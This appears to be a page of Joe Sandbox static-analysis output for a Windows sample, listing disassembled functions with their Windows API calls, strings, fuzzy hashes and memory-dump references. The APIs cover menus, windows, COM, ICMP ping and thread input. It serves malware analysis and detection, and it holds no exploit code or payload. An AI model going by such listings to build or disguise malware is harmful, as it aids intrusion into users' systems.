Opcode Fuzzy Hash: 08f5c702fdb74e379639f5cdde816d9e057322c4afa4103aa77e20e2bac0c0fe
Instruction Fuzzy Hash: 4051BC716183009BC305EF14C892AAFB7A5EF85304F544C2EF896AB2E2DB359D19CB57

Function 003A9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 003A9862
__swprintf.LIBCMT ref: 003A98AC
__i64tow.LIBCMT ref: 003DF5E6

Strings

%.15g, xrefs: 003A98A6
True, xrefs: 003DF5A7
False, xrefs: 003DF5AE
0x%p, xrefs: 003DF5C8

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 87c974d6b1aebf65cb0641da9e7c879d9840a6575c8b6976913b1181dd97815b
Instruction ID: e34cc4422a97689b6a6e7aa31d8fd19a8c503e480b3e0e6033f97f30e5cc7dab
Opcode Fuzzy Hash: 87c974d6b1aebf65cb0641da9e7c879d9840a6575c8b6976913b1181dd97815b
Instruction Fuzzy Hash: 3941B572504205AFDB26DF34E886F7A73EDEF46300F20446FE54AEB292EA359D418B10

Function 00427152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042716A
CreateMenu.USER32 ref: 00427185
SetMenu.USER32(?,00000000), ref: 00427194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00427221
IsMenu.USER32(?), ref: 00427237
CreatePopupMenu.USER32 ref: 00427241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0042726E
DrawMenuBar.USER32 ref: 00427276

Strings

0, xrefs: 00427160
F, xrefs: 00427262

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: d96e180e2dacfda8830976d3f0a77f3a2a12d469ef0cfba9e8555ebee98a4db1
Instruction ID: b32c701e12c37d0cf63ed0d755f429ce2da316f772b952f9eaceaa5ed8c271ad
Opcode Fuzzy Hash: d96e180e2dacfda8830976d3f0a77f3a2a12d469ef0cfba9e8555ebee98a4db1
Instruction Fuzzy Hash: 42418874A01215EFDB20DF64E984F9ABBB5FF48300F540069F905A7361D735A924CFA8

Function 004274BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0042755E
CreateCompatibleDC.GDI32(00000000), ref: 00427565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00427578
SelectObject.GDI32(00000000,00000000), ref: 00427580
GetPixel.GDI32(00000000,00000000,00000000), ref: 0042758B
DeleteDC.GDI32(00000000), ref: 00427594
GetWindowLongW.USER32(?,000000EC), ref: 0042759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004275B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004275BE

Strings

static, xrefs: 004274F6

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 9b2d3c4379e12a91284af2cfdb376eff041e0fc010b27e0cfde26e4a5d050752
Instruction ID: 8997a27cafd8b6aab8a6cd9941ed30555b359dabaa347ee4ae70d9ad0479ed85
Opcode Fuzzy Hash: 9b2d3c4379e12a91284af2cfdb376eff041e0fc010b27e0cfde26e4a5d050752
Instruction Fuzzy Hash: D7318031204124BBDF215F64EC08FDB7B79EF09764F900239FA15961A0C735D856DBA8

Function 003C6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003C6E3E

Part of subcall function 003C8B28: __getptd_noexit.LIBCMT ref: 003C8B28

__gmtime64_s.LIBCMT ref: 003C6ED7
__gmtime64_s.LIBCMT ref: 003C6F0D
__gmtime64_s.LIBCMT ref: 003C6F2A
__allrem.LIBCMT ref: 003C6F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003C6F9C
__allrem.LIBCMT ref: 003C6FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003C6FD1
__allrem.LIBCMT ref: 003C6FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003C7006
__invoke_watson.LIBCMT ref: 003C7077

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 0df5b0bbb7f3b1c20f820beaf75131c52552ca0083aaf302ac73d677ddb9dc9d
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: A171EA76A00717ABD716AF79DC42F5AB3A8AF04724F14422EF914DB681E770ED408B90

Function 00402527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00402542
GetMenuItemInfoW.USER32(00465890,000000FF,00000000,00000030), ref: 004025A3
SetMenuItemInfoW.USER32(00465890,00000004,00000000,00000030), ref: 004025D9
Sleep.KERNEL32(000001F4), ref: 004025EB
GetMenuItemCount.USER32(?), ref: 0040262F
GetMenuItemID.USER32(?,00000000), ref: 0040264B
GetMenuItemID.USER32(?,-00000001), ref: 00402675
GetMenuItemID.USER32(?,?), ref: 004026BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00402700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00402714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00402735

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 53cbdb2f92180bfdcda2d59a99af9c9342756244cb2b8cce376f96b24c6ac8ae
Instruction ID: a79d7b6026d84826c7f17530f14b1ae80b792284f23504c5dec2642133127ec0
Opcode Fuzzy Hash: 53cbdb2f92180bfdcda2d59a99af9c9342756244cb2b8cce376f96b24c6ac8ae
Instruction Fuzzy Hash: 74618070600249AFDB21CF64CE88DAF7BB8EB01304F54047AE841A72D1D7B9AD46DB29

Function 00426F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00426FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00426FA8
GetWindowLongW.USER32(?,000000F0), ref: 00426FCC
_memset.LIBCMT ref: 00426FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00426FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00427067

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 5ad5305d5856e44f5276a929a56fb41d832346bf7fb7abd34afd4d94471477e7
Instruction ID: 790732a0ccf310c16f1ad3bd8e3ce0c215bb352742ba67fcbce371aa9ceb3a47
Opcode Fuzzy Hash: 5ad5305d5856e44f5276a929a56fb41d832346bf7fb7abd34afd4d94471477e7
Instruction Fuzzy Hash: D5619B71A00218AFDB11DFA4DC81EEE77B8EF08700F50016AFA14AB3A1D774AD55DBA4

Function 003F6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003F6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 003F6C18
VariantInit.OLEAUT32(?), ref: 003F6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 003F6C4A
VariantCopy.OLEAUT32(?,?), ref: 003F6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 003F6CB1
VariantClear.OLEAUT32(?), ref: 003F6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 003F6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003F6CDC
VariantClear.OLEAUT32(?), ref: 003F6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003F6CF9

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 6d510be77f882937f15c1476f1068e2950058b59b4465c43dde4ca0a3fc65d1f
Instruction ID: 886ae9c4a3f87917b6cfadf9318b10982429878a9649ae3a9cd66b4521faf0f4
Opcode Fuzzy Hash: 6d510be77f882937f15c1476f1068e2950058b59b4465c43dde4ca0a3fc65d1f
Instruction Fuzzy Hash: D9415431A0011D9FCF11EFA4D8459AEBBB9EF18350F408075EA55E7261CB70AA46CFA0

Function 004183BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 003A9837: __itow.LIBCMT ref: 003A9862
Part of subcall function 003A9837: __swprintf.LIBCMT ref: 003A98AC

CoInitialize.OLE32 ref: 00418403
CoUninitialize.OLE32 ref: 0041840E
CoCreateInstance.OLE32(?,00000000,00000017,00432BEC,?), ref: 0041846E
IIDFromString.OLE32(?,?), ref: 004184E1
VariantInit.OLEAUT32(?), ref: 0041857B
VariantClear.OLEAUT32(?), ref: 004185DC

Strings

NULL Pointer assignment, xrefs: 004184B3
Failed to create object, xrefs: 00418479, 0041852F
Invalid parameter, xrefs: 004184FA

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: d2c57272dd7300a3da69fbd26bb846d2c69b58ba1b608768d184b2a0eec61447
Instruction ID: 0dc82885c5a7cf21287356e2880c4207932249d405407a5bf95c1d476301e445
Opcode Fuzzy Hash: d2c57272dd7300a3da69fbd26bb846d2c69b58ba1b608768d184b2a0eec61447
Instruction Fuzzy Hash: 7161AC70608312AFC711DF14C848BABB7E9EF49754F40041EF9819B291DB78ED89CB9A

Function 00415732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00415793
inet_addr.WSOCK32(?), ref: 004157D8
gethostbyname.WSOCK32(?), ref: 004157E4
IcmpCreateFile.IPHLPAPI ref: 004157F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00415862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00415878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 004158ED
WSACleanup.WSOCK32 ref: 004158F3

Strings

Ping, xrefs: 00415816

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 75d5134ffe469e9261020d0c99b7b7fde0d436ac6e5b90acba4f764b8af04336
Instruction ID: 04b0eac927abb15f2e4160358d8e7ff775eb1b40b084dec7e90e376eefd8c025
Opcode Fuzzy Hash: 75d5134ffe469e9261020d0c99b7b7fde0d436ac6e5b90acba4f764b8af04336
Instruction Fuzzy Hash: EA51AE31600700DFD721AF24CC46BAAB7E4EF89710F44492AF956EB2A1DB34EC55CB5A

Function 0040B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0040B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0040B546
GetLastError.KERNEL32 ref: 0040B550
SetErrorMode.KERNEL32(00000000,READY), ref: 0040B5BD

Strings

NOTREADY, xrefs: 0040B57C
READONLY, xrefs: 0040B588
READY, xrefs: 0040B596
UNKNOWN, xrefs: 0040B575
INVALID, xrefs: 0040B58F

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 640cfcc3dd0ee7d159c37ae40b0666cc641120e588146ee1a55ba334c485310d
Instruction ID: 9ab9d62d06aac3c98817388eb52ccbea0e74691becab136d527ab79ae43c1d69
Opcode Fuzzy Hash: 640cfcc3dd0ee7d159c37ae40b0666cc641120e588146ee1a55ba334c485310d
Instruction Fuzzy Hash: 5B319235A00205AFC710EB68CC45AAA77B8EF05305F5041BBF905BB2D1DB749A06CB99

Function 003F8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

Part of subcall function 003FAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003FAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003F9014
GetDlgCtrlID.USER32 ref: 003F901F
GetParent.USER32 ref: 003F903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 003F903E
GetDlgCtrlID.USER32(?), ref: 003F9047
GetParent.USER32(?), ref: 003F9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 003F9066

Strings

ListBox, xrefs: 003F8FD1
ComboBox, xrefs: 003F8F9C

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: a7263ebc7959566b95e5cf57c5fc6ce40b8216f95e0cfd02a3e652714d5ccc98
Instruction ID: cd47eac00adae704cc2a84bb257c374d0c0684c625ea8e6c5f2bcf08f9f1cc30
Opcode Fuzzy Hash: a7263ebc7959566b95e5cf57c5fc6ce40b8216f95e0cfd02a3e652714d5ccc98
Instruction Fuzzy Hash: 4E21C774A00109BBDF16ABA0CC85FFEB774EF49310F50012AB911972A1DB75581EDA24

Function 003F907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

Part of subcall function 003FAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003FAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003F90FD
GetDlgCtrlID.USER32 ref: 003F9108
GetParent.USER32 ref: 003F9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 003F9127
GetDlgCtrlID.USER32(?), ref: 003F9130
GetParent.USER32(?), ref: 003F914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 003F914F

Strings

ListBox, xrefs: 003F90BC
ComboBox, xrefs: 003F9087

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: abdaf44cefc68407483c07d121c31b30f40eddc8aeb6b3cc2f5907fbe80362c1
Instruction ID: a6622c3ed74b9eabeb3f673e999242eca3368b91a638cf5e64496e487a75a567
Opcode Fuzzy Hash: abdaf44cefc68407483c07d121c31b30f40eddc8aeb6b3cc2f5907fbe80362c1
Instruction Fuzzy Hash: 0321B875A00109BBDF12ABA4CC85FFEB774EF45300F904036BA11972A1DB75541EDA24

Function 003F9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 003F916F
GetClassNameW.USER32(00000000,?,00000100), ref: 003F9184
_wcscmp.LIBCMT ref: 003F9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003F9211

Strings

details, xrefs: 003F91BF
list, xrefs: 003F91F3
largeicons, xrefs: 003F91A5
SHELLDLL_DefView, xrefs: 003F9190
smallicons, xrefs: 003F91D9

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 76cddee321a117e9d8e5f7ae82f814262a652fbcb6f8518f2066bd1c70f4a2bb
Instruction ID: dcd6e5deae7f6f15d75fa434bb1a776f0abe0facf83dc521bcb82bc1bc8d1435
Opcode Fuzzy Hash: 76cddee321a117e9d8e5f7ae82f814262a652fbcb6f8518f2066bd1c70f4a2bb
Instruction Fuzzy Hash: 2911CA7A24830FB9FA232624EC06FB7379CDB15761B300437FE00E54E2EE655C555698

Function 00407990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00407A6C

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: ae11f7424353069f53f4be611a6eb1e2165f7a97a1584f380dbd92abecdf37d5
Instruction ID: a5c559ac2b5f4e3fbf9e51d5af05bd508462724db05647221d6ab979c058463a
Opcode Fuzzy Hash: ae11f7424353069f53f4be611a6eb1e2165f7a97a1584f380dbd92abecdf37d5
Instruction Fuzzy Hash: A5B16D71D082099FEB11DFA4C884BBEB7B4EF09325F14443AE501FB281D778A941CB96

Function 004011CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004011F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00400268,?,00000001), ref: 00401204
GetWindowThreadProcessId.USER32(00000000), ref: 0040120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00400268,?,00000001), ref: 0040121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00400268,?,00000001), ref: 00401245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00400268,?,00000001), ref: 00401257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00400268,?,00000001), ref: 0040129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00400268,?,00000001), ref: 004012B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00400268,?,00000001), ref: 004012BC

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 2e10cc1e9f83184d58e916068e779272add60522dd9147be64ac08ff91d603ec
Instruction ID: 6a2074458a01066a4cc40eb61535e90f3b7b56ff98c568f1ecfc5e6e6556fa75
